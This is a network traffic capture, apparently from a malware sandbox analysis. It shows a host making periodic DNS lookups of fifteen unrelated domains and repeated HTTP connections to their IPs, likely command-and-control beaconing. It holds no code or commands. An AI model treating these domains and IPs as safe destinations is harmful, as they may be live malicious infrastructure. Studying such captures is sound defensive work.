Jun 13, 2024 11:05:59.218255997 CEST	49745	80	192.168.2.5	162.0.213.72
Jun 13, 2024 11:05:59.218287945 CEST	80	49745	162.0.213.72	192.168.2.5
Jun 13, 2024 11:05:59.218322039 CEST	80	49745	162.0.213.72	192.168.2.5
Jun 13, 2024 11:05:59.218333006 CEST	49745	80	192.168.2.5	162.0.213.72
Jun 13, 2024 11:05:59.218353033 CEST	80	49745	162.0.213.72	192.168.2.5
Jun 13, 2024 11:05:59.218408108 CEST	80	49745	162.0.213.72	192.168.2.5
Jun 13, 2024 11:05:59.218420029 CEST	49745	80	192.168.2.5	162.0.213.72
Jun 13, 2024 11:05:59.218446016 CEST	80	49745	162.0.213.72	192.168.2.5
Jun 13, 2024 11:05:59.218489885 CEST	49745	80	192.168.2.5	162.0.213.72
Jun 13, 2024 11:05:59.223573923 CEST	80	49745	162.0.213.72	192.168.2.5
Jun 13, 2024 11:05:59.223591089 CEST	80	49745	162.0.213.72	192.168.2.5
Jun 13, 2024 11:05:59.223608971 CEST	80	49745	162.0.213.72	192.168.2.5
Jun 13, 2024 11:05:59.223630905 CEST	49745	80	192.168.2.5	162.0.213.72
Jun 13, 2024 11:05:59.223865032 CEST	80	49745	162.0.213.72	192.168.2.5
Jun 13, 2024 11:05:59.223910093 CEST	49745	80	192.168.2.5	162.0.213.72
Jun 13, 2024 11:05:59.334079027 CEST	80	49745	162.0.213.72	192.168.2.5
Jun 13, 2024 11:05:59.334117889 CEST	80	49745	162.0.213.72	192.168.2.5
Jun 13, 2024 11:05:59.334167957 CEST	49745	80	192.168.2.5	162.0.213.72
Jun 13, 2024 11:05:59.334178925 CEST	80	49745	162.0.213.72	192.168.2.5
Jun 13, 2024 11:05:59.334225893 CEST	49745	80	192.168.2.5	162.0.213.72
Jun 13, 2024 11:06:00.062208891 CEST	49745	80	192.168.2.5	162.0.213.72
Jun 13, 2024 11:06:01.079960108 CEST	49746	80	192.168.2.5	162.0.213.72
Jun 13, 2024 11:06:01.086051941 CEST	80	49746	162.0.213.72	192.168.2.5
Jun 13, 2024 11:06:01.086128950 CEST	49746	80	192.168.2.5	162.0.213.72
Jun 13, 2024 11:06:01.088593006 CEST	49746	80	192.168.2.5	162.0.213.72
Jun 13, 2024 11:06:01.095735073 CEST	80	49746	162.0.213.72	192.168.2.5
Jun 13, 2024 11:06:01.095793009 CEST	80	49746	162.0.213.72	192.168.2.5
Jun 13, 2024 11:06:01.771080017 CEST	80	49746	162.0.213.72	192.168.2.5
Jun 13, 2024 11:06:01.771126032 CEST	80	49746	162.0.213.72	192.168.2.5
Jun 13, 2024 11:06:01.771162033 CEST	80	49746	162.0.213.72	192.168.2.5
Jun 13, 2024 11:06:01.771194935 CEST	80	49746	162.0.213.72	192.168.2.5
Jun 13, 2024 11:06:01.771231890 CEST	80	49746	162.0.213.72	192.168.2.5
Jun 13, 2024 11:06:01.771265030 CEST	80	49746	162.0.213.72	192.168.2.5
Jun 13, 2024 11:06:01.771265984 CEST	49746	80	192.168.2.5	162.0.213.72
Jun 13, 2024 11:06:01.771292925 CEST	49746	80	192.168.2.5	162.0.213.72
Jun 13, 2024 11:06:01.771300077 CEST	80	49746	162.0.213.72	192.168.2.5
Jun 13, 2024 11:06:01.771330118 CEST	80	49746	162.0.213.72	192.168.2.5
Jun 13, 2024 11:06:01.771363020 CEST	80	49746	162.0.213.72	192.168.2.5
Jun 13, 2024 11:06:01.771394014 CEST	49746	80	192.168.2.5	162.0.213.72
Jun 13, 2024 11:06:01.771399021 CEST	80	49746	162.0.213.72	192.168.2.5
Jun 13, 2024 11:06:01.776041985 CEST	49746	80	192.168.2.5	162.0.213.72
Jun 13, 2024 11:06:01.776411057 CEST	80	49746	162.0.213.72	192.168.2.5
Jun 13, 2024 11:06:01.776458025 CEST	80	49746	162.0.213.72	192.168.2.5
Jun 13, 2024 11:06:01.776530981 CEST	80	49746	162.0.213.72	192.168.2.5
Jun 13, 2024 11:06:01.776693106 CEST	49746	80	192.168.2.5	162.0.213.72
Jun 13, 2024 11:06:01.887748003 CEST	80	49746	162.0.213.72	192.168.2.5
Jun 13, 2024 11:06:01.887973070 CEST	80	49746	162.0.213.72	192.168.2.5
Jun 13, 2024 11:06:01.887989998 CEST	80	49746	162.0.213.72	192.168.2.5
Jun 13, 2024 11:06:01.892030954 CEST	49746	80	192.168.2.5	162.0.213.72
Jun 13, 2024 11:06:02.594929934 CEST	49746	80	192.168.2.5	162.0.213.72
Jun 13, 2024 11:06:03.611537933 CEST	49747	80	192.168.2.5	162.0.213.72
Jun 13, 2024 11:06:03.616571903 CEST	80	49747	162.0.213.72	192.168.2.5
Jun 13, 2024 11:06:03.616650105 CEST	49747	80	192.168.2.5	162.0.213.72
Jun 13, 2024 11:06:03.618855000 CEST	49747	80	192.168.2.5	162.0.213.72
Jun 13, 2024 11:06:03.623826027 CEST	80	49747	162.0.213.72	192.168.2.5
Jun 13, 2024 11:06:04.292340040 CEST	80	49747	162.0.213.72	192.168.2.5
Jun 13, 2024 11:06:04.292406082 CEST	80	49747	162.0.213.72	192.168.2.5
Jun 13, 2024 11:06:04.292443037 CEST	80	49747	162.0.213.72	192.168.2.5
Jun 13, 2024 11:06:04.292478085 CEST	80	49747	162.0.213.72	192.168.2.5
Jun 13, 2024 11:06:04.292538881 CEST	80	49747	162.0.213.72	192.168.2.5
Jun 13, 2024 11:06:04.292561054 CEST	49747	80	192.168.2.5	162.0.213.72
Jun 13, 2024 11:06:04.292561054 CEST	49747	80	192.168.2.5	162.0.213.72
Jun 13, 2024 11:06:04.292573929 CEST	80	49747	162.0.213.72	192.168.2.5
Jun 13, 2024 11:06:04.292613983 CEST	80	49747	162.0.213.72	192.168.2.5
Jun 13, 2024 11:06:04.292645931 CEST	80	49747	162.0.213.72	192.168.2.5
Jun 13, 2024 11:06:04.292679071 CEST	80	49747	162.0.213.72	192.168.2.5
Jun 13, 2024 11:06:04.292680025 CEST	49747	80	192.168.2.5	162.0.213.72
Jun 13, 2024 11:06:04.292705059 CEST	49747	80	192.168.2.5	162.0.213.72
Jun 13, 2024 11:06:04.292716026 CEST	80	49747	162.0.213.72	192.168.2.5
Jun 13, 2024 11:06:04.292865038 CEST	49747	80	192.168.2.5	162.0.213.72
Jun 13, 2024 11:06:04.297672033 CEST	80	49747	162.0.213.72	192.168.2.5
Jun 13, 2024 11:06:04.297732115 CEST	80	49747	162.0.213.72	192.168.2.5
Jun 13, 2024 11:06:04.297765970 CEST	80	49747	162.0.213.72	192.168.2.5
Jun 13, 2024 11:06:04.297801971 CEST	80	49747	162.0.213.72	192.168.2.5
Jun 13, 2024 11:06:04.297833920 CEST	49747	80	192.168.2.5	162.0.213.72
Jun 13, 2024 11:06:04.297929049 CEST	49747	80	192.168.2.5	162.0.213.72
Jun 13, 2024 11:06:04.408829927 CEST	80	49747	162.0.213.72	192.168.2.5
Jun 13, 2024 11:06:04.408854961 CEST	80	49747	162.0.213.72	192.168.2.5
Jun 13, 2024 11:06:04.408874035 CEST	80	49747	162.0.213.72	192.168.2.5
Jun 13, 2024 11:06:04.409009933 CEST	49747	80	192.168.2.5	162.0.213.72
Jun 13, 2024 11:06:04.409009933 CEST	49747	80	192.168.2.5	162.0.213.72
Jun 13, 2024 11:06:04.411361933 CEST	49747	80	192.168.2.5	162.0.213.72
Jun 13, 2024 11:06:04.416239023 CEST	80	49747	162.0.213.72	192.168.2.5
Jun 13, 2024 11:06:09.510979891 CEST	49748	80	192.168.2.5	217.116.0.191
Jun 13, 2024 11:06:09.515959024 CEST	80	49748	217.116.0.191	192.168.2.5
Jun 13, 2024 11:06:09.516035080 CEST	49748	80	192.168.2.5	217.116.0.191
Jun 13, 2024 11:06:09.518826962 CEST	49748	80	192.168.2.5	217.116.0.191
Jun 13, 2024 11:06:09.523721933 CEST	80	49748	217.116.0.191	192.168.2.5
Jun 13, 2024 11:06:10.406095028 CEST	80	49748	217.116.0.191	192.168.2.5
Jun 13, 2024 11:06:10.452055931 CEST	49748	80	192.168.2.5	217.116.0.191
Jun 13, 2024 11:06:10.547658920 CEST	80	49748	217.116.0.191	192.168.2.5
Jun 13, 2024 11:06:10.547971964 CEST	49748	80	192.168.2.5	217.116.0.191
Jun 13, 2024 11:06:11.035276890 CEST	49748	80	192.168.2.5	217.116.0.191
Jun 13, 2024 11:06:12.048290968 CEST	49749	80	192.168.2.5	217.116.0.191
Jun 13, 2024 11:06:12.053267956 CEST	80	49749	217.116.0.191	192.168.2.5
Jun 13, 2024 11:06:12.054672956 CEST	49749	80	192.168.2.5	217.116.0.191
Jun 13, 2024 11:06:12.059601068 CEST	49749	80	192.168.2.5	217.116.0.191
Jun 13, 2024 11:06:12.066411018 CEST	80	49749	217.116.0.191	192.168.2.5
Jun 13, 2024 11:06:12.958611012 CEST	80	49749	217.116.0.191	192.168.2.5
Jun 13, 2024 11:06:12.998104095 CEST	49749	80	192.168.2.5	217.116.0.191
Jun 13, 2024 11:06:13.102394104 CEST	80	49749	217.116.0.191	192.168.2.5
Jun 13, 2024 11:06:13.102519035 CEST	49749	80	192.168.2.5	217.116.0.191
Jun 13, 2024 11:06:13.560663939 CEST	49749	80	192.168.2.5	217.116.0.191
Jun 13, 2024 11:06:14.579466105 CEST	49750	80	192.168.2.5	217.116.0.191
Jun 13, 2024 11:06:14.584705114 CEST	80	49750	217.116.0.191	192.168.2.5
Jun 13, 2024 11:06:14.584795952 CEST	49750	80	192.168.2.5	217.116.0.191
Jun 13, 2024 11:06:14.586801052 CEST	49750	80	192.168.2.5	217.116.0.191
Jun 13, 2024 11:06:14.591794014 CEST	80	49750	217.116.0.191	192.168.2.5
Jun 13, 2024 11:06:14.592190027 CEST	80	49750	217.116.0.191	192.168.2.5
Jun 13, 2024 11:06:15.477722883 CEST	80	49750	217.116.0.191	192.168.2.5
Jun 13, 2024 11:06:15.529577971 CEST	49750	80	192.168.2.5	217.116.0.191
Jun 13, 2024 11:06:15.619617939 CEST	80	49750	217.116.0.191	192.168.2.5
Jun 13, 2024 11:06:15.619995117 CEST	49750	80	192.168.2.5	217.116.0.191
Jun 13, 2024 11:06:16.092051983 CEST	49750	80	192.168.2.5	217.116.0.191
Jun 13, 2024 11:06:17.118093014 CEST	49751	80	192.168.2.5	217.116.0.191
Jun 13, 2024 11:06:17.123132944 CEST	80	49751	217.116.0.191	192.168.2.5
Jun 13, 2024 11:06:17.123225927 CEST	49751	80	192.168.2.5	217.116.0.191
Jun 13, 2024 11:06:17.125610113 CEST	49751	80	192.168.2.5	217.116.0.191
Jun 13, 2024 11:06:17.130528927 CEST	80	49751	217.116.0.191	192.168.2.5
Jun 13, 2024 11:06:18.009357929 CEST	80	49751	217.116.0.191	192.168.2.5
Jun 13, 2024 11:06:18.009433985 CEST	80	49751	217.116.0.191	192.168.2.5
Jun 13, 2024 11:06:18.010313034 CEST	49751	80	192.168.2.5	217.116.0.191
Jun 13, 2024 11:06:18.149425030 CEST	80	49751	217.116.0.191	192.168.2.5
Jun 13, 2024 11:06:18.149594069 CEST	49751	80	192.168.2.5	217.116.0.191
Jun 13, 2024 11:06:18.150943041 CEST	49751	80	192.168.2.5	217.116.0.191
Jun 13, 2024 11:06:18.155920982 CEST	80	49751	217.116.0.191	192.168.2.5
Jun 13, 2024 11:06:23.727051020 CEST	49752	80	192.168.2.5	103.120.80.111
Jun 13, 2024 11:06:23.732078075 CEST	80	49752	103.120.80.111	192.168.2.5
Jun 13, 2024 11:06:23.734731913 CEST	49752	80	192.168.2.5	103.120.80.111
Jun 13, 2024 11:06:23.739181995 CEST	49752	80	192.168.2.5	103.120.80.111
Jun 13, 2024 11:06:23.756191015 CEST	80	49752	103.120.80.111	192.168.2.5
Jun 13, 2024 11:06:24.917191029 CEST	80	49752	103.120.80.111	192.168.2.5
Jun 13, 2024 11:06:24.917241096 CEST	49752	80	192.168.2.5	103.120.80.111
Jun 13, 2024 11:06:25.248358011 CEST	49752	80	192.168.2.5	103.120.80.111
Jun 13, 2024 11:06:25.255212069 CEST	80	49752	103.120.80.111	192.168.2.5
Jun 13, 2024 11:06:26.268079042 CEST	49753	80	192.168.2.5	103.120.80.111
Jun 13, 2024 11:06:26.273094893 CEST	80	49753	103.120.80.111	192.168.2.5
Jun 13, 2024 11:06:26.276165962 CEST	49753	80	192.168.2.5	103.120.80.111
Jun 13, 2024 11:06:26.280071020 CEST	49753	80	192.168.2.5	103.120.80.111
Jun 13, 2024 11:06:26.284955978 CEST	80	49753	103.120.80.111	192.168.2.5
Jun 13, 2024 11:06:27.648819923 CEST	80	49753	103.120.80.111	192.168.2.5
Jun 13, 2024 11:06:27.648941994 CEST	49753	80	192.168.2.5	103.120.80.111
Jun 13, 2024 11:06:27.779405117 CEST	49753	80	192.168.2.5	103.120.80.111
Jun 13, 2024 11:06:27.786058903 CEST	80	49753	103.120.80.111	192.168.2.5
Jun 13, 2024 11:06:28.800024986 CEST	49754	80	192.168.2.5	103.120.80.111
Jun 13, 2024 11:06:28.804893970 CEST	80	49754	103.120.80.111	192.168.2.5
Jun 13, 2024 11:06:28.804955006 CEST	49754	80	192.168.2.5	103.120.80.111
Jun 13, 2024 11:06:28.807638884 CEST	49754	80	192.168.2.5	103.120.80.111
Jun 13, 2024 11:06:28.812504053 CEST	80	49754	103.120.80.111	192.168.2.5
Jun 13, 2024 11:06:28.813493013 CEST	80	49754	103.120.80.111	192.168.2.5
Jun 13, 2024 11:06:29.787096024 CEST	80	49754	103.120.80.111	192.168.2.5
Jun 13, 2024 11:06:29.792170048 CEST	49754	80	192.168.2.5	103.120.80.111
Jun 13, 2024 11:06:30.312072992 CEST	49754	80	192.168.2.5	103.120.80.111
Jun 13, 2024 11:06:30.317117929 CEST	80	49754	103.120.80.111	192.168.2.5
Jun 13, 2024 11:06:31.329536915 CEST	49755	80	192.168.2.5	103.120.80.111
Jun 13, 2024 11:06:31.337256908 CEST	80	49755	103.120.80.111	192.168.2.5
Jun 13, 2024 11:06:31.337368011 CEST	49755	80	192.168.2.5	103.120.80.111
Jun 13, 2024 11:06:31.339003086 CEST	49755	80	192.168.2.5	103.120.80.111
Jun 13, 2024 11:06:31.343988895 CEST	80	49755	103.120.80.111	192.168.2.5
Jun 13, 2024 11:06:32.316447020 CEST	80	49755	103.120.80.111	192.168.2.5
Jun 13, 2024 11:06:32.316462040 CEST	80	49755	103.120.80.111	192.168.2.5
Jun 13, 2024 11:06:32.316473007 CEST	80	49755	103.120.80.111	192.168.2.5
Jun 13, 2024 11:06:32.316670895 CEST	80	49755	103.120.80.111	192.168.2.5
Jun 13, 2024 11:06:32.316682100 CEST	80	49755	103.120.80.111	192.168.2.5
Jun 13, 2024 11:06:32.316693068 CEST	80	49755	103.120.80.111	192.168.2.5
Jun 13, 2024 11:06:32.316699028 CEST	49755	80	192.168.2.5	103.120.80.111
Jun 13, 2024 11:06:32.316703081 CEST	80	49755	103.120.80.111	192.168.2.5
Jun 13, 2024 11:06:32.316771984 CEST	49755	80	192.168.2.5	103.120.80.111
Jun 13, 2024 11:06:32.357446909 CEST	49755	80	192.168.2.5	103.120.80.111
Jun 13, 2024 11:06:32.506812096 CEST	80	49755	103.120.80.111	192.168.2.5
Jun 13, 2024 11:06:32.508181095 CEST	49755	80	192.168.2.5	103.120.80.111
Jun 13, 2024 11:06:32.512160063 CEST	49755	80	192.168.2.5	103.120.80.111
Jun 13, 2024 11:06:32.517086983 CEST	80	49755	103.120.80.111	192.168.2.5
Jun 13, 2024 11:06:37.555633068 CEST	49756	80	192.168.2.5	64.226.69.42
Jun 13, 2024 11:06:37.560460091 CEST	80	49756	64.226.69.42	192.168.2.5
Jun 13, 2024 11:06:37.560516119 CEST	49756	80	192.168.2.5	64.226.69.42
Jun 13, 2024 11:06:37.562277079 CEST	49756	80	192.168.2.5	64.226.69.42
Jun 13, 2024 11:06:37.567972898 CEST	80	49756	64.226.69.42	192.168.2.5
Jun 13, 2024 11:06:38.402101040 CEST	80	49756	64.226.69.42	192.168.2.5
Jun 13, 2024 11:06:38.451327085 CEST	49756	80	192.168.2.5	64.226.69.42
Jun 13, 2024 11:06:38.525094986 CEST	80	49756	64.226.69.42	192.168.2.5
Jun 13, 2024 11:06:38.526446104 CEST	49756	80	192.168.2.5	64.226.69.42
Jun 13, 2024 11:06:39.076245070 CEST	49756	80	192.168.2.5	64.226.69.42
Jun 13, 2024 11:06:40.095387936 CEST	49757	80	192.168.2.5	64.226.69.42
Jun 13, 2024 11:06:40.100178957 CEST	80	49757	64.226.69.42	192.168.2.5
Jun 13, 2024 11:06:40.100502968 CEST	49757	80	192.168.2.5	64.226.69.42
Jun 13, 2024 11:06:40.102705002 CEST	49757	80	192.168.2.5	64.226.69.42
Jun 13, 2024 11:06:40.107932091 CEST	80	49757	64.226.69.42	192.168.2.5
Jun 13, 2024 11:06:40.947716951 CEST	80	49757	64.226.69.42	192.168.2.5
Jun 13, 2024 11:06:40.998087883 CEST	49757	80	192.168.2.5	64.226.69.42
Jun 13, 2024 11:06:41.072746992 CEST	80	49757	64.226.69.42	192.168.2.5
Jun 13, 2024 11:06:41.072797060 CEST	49757	80	192.168.2.5	64.226.69.42
Jun 13, 2024 11:06:41.607515097 CEST	49757	80	192.168.2.5	64.226.69.42
Jun 13, 2024 11:06:42.628182888 CEST	49758	80	192.168.2.5	64.226.69.42
Jun 13, 2024 11:06:42.633054018 CEST	80	49758	64.226.69.42	192.168.2.5
Jun 13, 2024 11:06:42.636195898 CEST	49758	80	192.168.2.5	64.226.69.42
Jun 13, 2024 11:06:42.640311956 CEST	49758	80	192.168.2.5	64.226.69.42
Jun 13, 2024 11:06:42.645708084 CEST	80	49758	64.226.69.42	192.168.2.5
Jun 13, 2024 11:06:42.645721912 CEST	80	49758	64.226.69.42	192.168.2.5
Jun 13, 2024 11:06:43.493549109 CEST	80	49758	64.226.69.42	192.168.2.5
Jun 13, 2024 11:06:43.544944048 CEST	49758	80	192.168.2.5	64.226.69.42
Jun 13, 2024 11:06:43.623167038 CEST	80	49758	64.226.69.42	192.168.2.5
Jun 13, 2024 11:06:43.623243093 CEST	49758	80	192.168.2.5	64.226.69.42
Jun 13, 2024 11:06:44.154402018 CEST	49758	80	192.168.2.5	64.226.69.42
Jun 13, 2024 11:06:45.174031019 CEST	49759	80	192.168.2.5	64.226.69.42
Jun 13, 2024 11:06:45.181660891 CEST	80	49759	64.226.69.42	192.168.2.5
Jun 13, 2024 11:06:45.181749105 CEST	49759	80	192.168.2.5	64.226.69.42
Jun 13, 2024 11:06:45.183947086 CEST	49759	80	192.168.2.5	64.226.69.42
Jun 13, 2024 11:06:45.191715956 CEST	80	49759	64.226.69.42	192.168.2.5
Jun 13, 2024 11:06:46.010099888 CEST	80	49759	64.226.69.42	192.168.2.5
Jun 13, 2024 11:06:46.060591936 CEST	49759	80	192.168.2.5	64.226.69.42
Jun 13, 2024 11:06:46.133023977 CEST	80	49759	64.226.69.42	192.168.2.5
Jun 13, 2024 11:06:46.136502028 CEST	49759	80	192.168.2.5	64.226.69.42
Jun 13, 2024 11:06:46.140116930 CEST	49759	80	192.168.2.5	64.226.69.42
Jun 13, 2024 11:06:46.144884109 CEST	80	49759	64.226.69.42	192.168.2.5
Jun 13, 2024 11:06:51.324501038 CEST	49760	80	192.168.2.5	15.197.204.56
Jun 13, 2024 11:06:51.329418898 CEST	80	49760	15.197.204.56	192.168.2.5
Jun 13, 2024 11:06:51.329487085 CEST	49760	80	192.168.2.5	15.197.204.56
Jun 13, 2024 11:06:51.331738949 CEST	49760	80	192.168.2.5	15.197.204.56
Jun 13, 2024 11:06:51.336563110 CEST	80	49760	15.197.204.56	192.168.2.5
Jun 13, 2024 11:06:52.292608976 CEST	80	49760	15.197.204.56	192.168.2.5
Jun 13, 2024 11:06:52.292692900 CEST	49760	80	192.168.2.5	15.197.204.56
Jun 13, 2024 11:06:52.842236996 CEST	49760	80	192.168.2.5	15.197.204.56
Jun 13, 2024 11:06:52.847332001 CEST	80	49760	15.197.204.56	192.168.2.5
Jun 13, 2024 11:06:53.860255957 CEST	49761	80	192.168.2.5	15.197.204.56
Jun 13, 2024 11:06:53.866178036 CEST	80	49761	15.197.204.56	192.168.2.5
Jun 13, 2024 11:06:53.869693041 CEST	49761	80	192.168.2.5	15.197.204.56
Jun 13, 2024 11:06:53.869693041 CEST	49761	80	192.168.2.5	15.197.204.56
Jun 13, 2024 11:06:53.875015020 CEST	80	49761	15.197.204.56	192.168.2.5
Jun 13, 2024 11:06:54.806600094 CEST	80	49761	15.197.204.56	192.168.2.5
Jun 13, 2024 11:06:54.806655884 CEST	49761	80	192.168.2.5	15.197.204.56
Jun 13, 2024 11:06:55.373142958 CEST	49761	80	192.168.2.5	15.197.204.56
Jun 13, 2024 11:06:55.380177021 CEST	80	49761	15.197.204.56	192.168.2.5
Jun 13, 2024 11:06:56.392508984 CEST	49762	80	192.168.2.5	15.197.204.56
Jun 13, 2024 11:06:56.398606062 CEST	80	49762	15.197.204.56	192.168.2.5
Jun 13, 2024 11:06:56.400012016 CEST	49762	80	192.168.2.5	15.197.204.56
Jun 13, 2024 11:06:56.402291059 CEST	49762	80	192.168.2.5	15.197.204.56
Jun 13, 2024 11:06:56.407294989 CEST	80	49762	15.197.204.56	192.168.2.5
Jun 13, 2024 11:06:56.407354116 CEST	80	49762	15.197.204.56	192.168.2.5
Jun 13, 2024 11:06:57.390552998 CEST	80	49762	15.197.204.56	192.168.2.5
Jun 13, 2024 11:06:57.390708923 CEST	49762	80	192.168.2.5	15.197.204.56
Jun 13, 2024 11:06:57.908201933 CEST	49762	80	192.168.2.5	15.197.204.56
Jun 13, 2024 11:06:57.913367987 CEST	80	49762	15.197.204.56	192.168.2.5
Jun 13, 2024 11:06:58.924263000 CEST	49763	80	192.168.2.5	15.197.204.56
Jun 13, 2024 11:06:58.929241896 CEST	80	49763	15.197.204.56	192.168.2.5
Jun 13, 2024 11:06:58.929320097 CEST	49763	80	192.168.2.5	15.197.204.56
Jun 13, 2024 11:06:58.931592941 CEST	49763	80	192.168.2.5	15.197.204.56
Jun 13, 2024 11:06:58.936630011 CEST	80	49763	15.197.204.56	192.168.2.5
Jun 13, 2024 11:06:59.826473951 CEST	80	49763	15.197.204.56	192.168.2.5
Jun 13, 2024 11:06:59.873084068 CEST	49763	80	192.168.2.5	15.197.204.56
Jun 13, 2024 11:06:59.950021029 CEST	80	49763	15.197.204.56	192.168.2.5
Jun 13, 2024 11:06:59.950160980 CEST	49763	80	192.168.2.5	15.197.204.56
Jun 13, 2024 11:06:59.951106071 CEST	49763	80	192.168.2.5	15.197.204.56
Jun 13, 2024 11:06:59.957509041 CEST	80	49763	15.197.204.56	192.168.2.5
Jun 13, 2024 11:07:04.975780964 CEST	49764	80	192.168.2.5	104.21.14.186
Jun 13, 2024 11:07:04.981122971 CEST	80	49764	104.21.14.186	192.168.2.5
Jun 13, 2024 11:07:04.981197119 CEST	49764	80	192.168.2.5	104.21.14.186
Jun 13, 2024 11:07:04.983449936 CEST	49764	80	192.168.2.5	104.21.14.186
Jun 13, 2024 11:07:04.988523960 CEST	80	49764	104.21.14.186	192.168.2.5
Jun 13, 2024 11:07:05.583487988 CEST	80	49764	104.21.14.186	192.168.2.5
Jun 13, 2024 11:07:05.585964918 CEST	80	49764	104.21.14.186	192.168.2.5
Jun 13, 2024 11:07:05.586026907 CEST	49764	80	192.168.2.5	104.21.14.186
Jun 13, 2024 11:07:07.123171091 CEST	49764	80	192.168.2.5	104.21.14.186

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 13, 2024 11:03:39.275446892 CEST	61957	53	192.168.2.5	1.1.1.1
Jun 13, 2024 11:03:39.592250109 CEST	53	61957	1.1.1.1	192.168.2.5
Jun 13, 2024 11:03:55.798470974 CEST	51257	53	192.168.2.5	1.1.1.1
Jun 13, 2024 11:03:55.860563040 CEST	53	51257	1.1.1.1	192.168.2.5
Jun 13, 2024 11:04:09.735359907 CEST	54075	53	192.168.2.5	1.1.1.1
Jun 13, 2024 11:04:09.777281046 CEST	53	54075	1.1.1.1	192.168.2.5
Jun 13, 2024 11:04:23.094487906 CEST	52386	53	192.168.2.5	1.1.1.1
Jun 13, 2024 11:04:23.465847969 CEST	53	52386	1.1.1.1	192.168.2.5
Jun 13, 2024 11:04:44.619891882 CEST	59470	53	192.168.2.5	1.1.1.1
Jun 13, 2024 11:04:44.659131050 CEST	53	59470	1.1.1.1	192.168.2.5
Jun 13, 2024 11:04:58.750987053 CEST	64939	53	192.168.2.5	1.1.1.1
Jun 13, 2024 11:04:59.083019018 CEST	53	64939	1.1.1.1	192.168.2.5
Jun 13, 2024 11:05:12.504131079 CEST	50261	53	192.168.2.5	1.1.1.1
Jun 13, 2024 11:05:12.864190102 CEST	53	50261	1.1.1.1	192.168.2.5
Jun 13, 2024 11:05:26.642972946 CEST	51517	53	192.168.2.5	1.1.1.1
Jun 13, 2024 11:05:26.946825981 CEST	53	51517	1.1.1.1	192.168.2.5
Jun 13, 2024 11:05:40.722040892 CEST	61995	53	192.168.2.5	1.1.1.1
Jun 13, 2024 11:05:41.487768888 CEST	53	61995	1.1.1.1	192.168.2.5
Jun 13, 2024 11:05:55.443736076 CEST	56192	53	192.168.2.5	1.1.1.1
Jun 13, 2024 11:05:56.001605988 CEST	53	56192	1.1.1.1	192.168.2.5
Jun 13, 2024 11:06:09.423979044 CEST	62839	53	192.168.2.5	1.1.1.1
Jun 13, 2024 11:06:09.508116007 CEST	53	62839	1.1.1.1	192.168.2.5
Jun 13, 2024 11:06:23.158776045 CEST	63358	53	192.168.2.5	1.1.1.1
Jun 13, 2024 11:06:23.722023010 CEST	53	63358	1.1.1.1	192.168.2.5
Jun 13, 2024 11:06:37.518295050 CEST	63342	53	192.168.2.5	1.1.1.1
Jun 13, 2024 11:06:37.553472042 CEST	53	63342	1.1.1.1	192.168.2.5
Jun 13, 2024 11:06:51.143923044 CEST	56836	53	192.168.2.5	1.1.1.1
Jun 13, 2024 11:06:51.321412086 CEST	53	56836	1.1.1.1	192.168.2.5
Jun 13, 2024 11:07:04.954644918 CEST	54912	53	192.168.2.5	1.1.1.1
Jun 13, 2024 11:07:04.972917080 CEST	53	54912	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jun 13, 2024 11:03:39.275446892 CEST	192.168.2.5	1.1.1.1	0xf64f	Standard query (0)	www.am1-728585.com	A (IP address)	IN (0x0001)	false
Jun 13, 2024 11:03:55.798470974 CEST	192.168.2.5	1.1.1.1	0x13d9	Standard query (0)	www.witoharmuth.com	A (IP address)	IN (0x0001)	false
Jun 13, 2024 11:04:09.735359907 CEST	192.168.2.5	1.1.1.1	0x3937	Standard query (0)	www.magnoliahairandco.com	A (IP address)	IN (0x0001)	false
Jun 13, 2024 11:04:23.094487906 CEST	192.168.2.5	1.1.1.1	0x9e40	Standard query (0)	www.binpvae.lol	A (IP address)	IN (0x0001)	false
Jun 13, 2024 11:04:44.619891882 CEST	192.168.2.5	1.1.1.1	0x3cbb	Standard query (0)	www.duzane.com	A (IP address)	IN (0x0001)	false
Jun 13, 2024 11:04:58.750987053 CEST	192.168.2.5	1.1.1.1	0x3206	Standard query (0)	www.mg55aa.xyz	A (IP address)	IN (0x0001)	false
Jun 13, 2024 11:05:12.504131079 CEST	192.168.2.5	1.1.1.1	0x6fa6	Standard query (0)	www.ie8mce.website	A (IP address)	IN (0x0001)	false
Jun 13, 2024 11:05:26.642972946 CEST	192.168.2.5	1.1.1.1	0x9834	Standard query (0)	www.shrongcen.com	A (IP address)	IN (0x0001)	false
Jun 13, 2024 11:05:40.722040892 CEST	192.168.2.5	1.1.1.1	0xbaac	Standard query (0)	www.skyinftech.com	A (IP address)	IN (0x0001)	false
Jun 13, 2024 11:05:55.443736076 CEST	192.168.2.5	1.1.1.1	0x9bf0	Standard query (0)	www.chowzen.top	A (IP address)	IN (0x0001)	false
Jun 13, 2024 11:06:09.423979044 CEST	192.168.2.5	1.1.1.1	0x40b5	Standard query (0)	www.lecoinsa.net	A (IP address)	IN (0x0001)	false
Jun 13, 2024 11:06:23.158776045 CEST	192.168.2.5	1.1.1.1	0x3303	Standard query (0)	www.zhuan-tou.com	A (IP address)	IN (0x0001)	false
Jun 13, 2024 11:06:37.518295050 CEST	192.168.2.5	1.1.1.1	0x1f2b	Standard query (0)	www.kacotae.com	A (IP address)	IN (0x0001)	false
Jun 13, 2024 11:06:51.143923044 CEST	192.168.2.5	1.1.1.1	0x3a3e	Standard query (0)	www.webuyfontana.com	A (IP address)	IN (0x0001)	false
Jun 13, 2024 11:07:04.954644918 CEST	192.168.2.5	1.1.1.1	0x5050	Standard query (0)	www.lunareafurniture.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jun 13, 2024 11:03:39.592250109 CEST	1.1.1.1	192.168.2.5	0xf64f	No error (0)	www.am1-728585.com		123.58.214.101	A (IP address)	IN (0x0001)	false
Jun 13, 2024 11:03:55.860563040 CEST	1.1.1.1	192.168.2.5	0x13d9	No error (0)	www.witoharmuth.com		85.13.162.190	A (IP address)	IN (0x0001)	false
Jun 13, 2024 11:04:09.777281046 CEST	1.1.1.1	192.168.2.5	0x3937	No error (0)	www.magnoliahairandco.com	cdn1.wixdns.net		CNAME (Canonical name)	IN (0x0001)	false
Jun 13, 2024 11:04:09.777281046 CEST	1.1.1.1	192.168.2.5	0x3937	No error (0)	cdn1.wixdns.net	td-ccm-neg-87-45.wixdns.net		CNAME (Canonical name)	IN (0x0001)	false
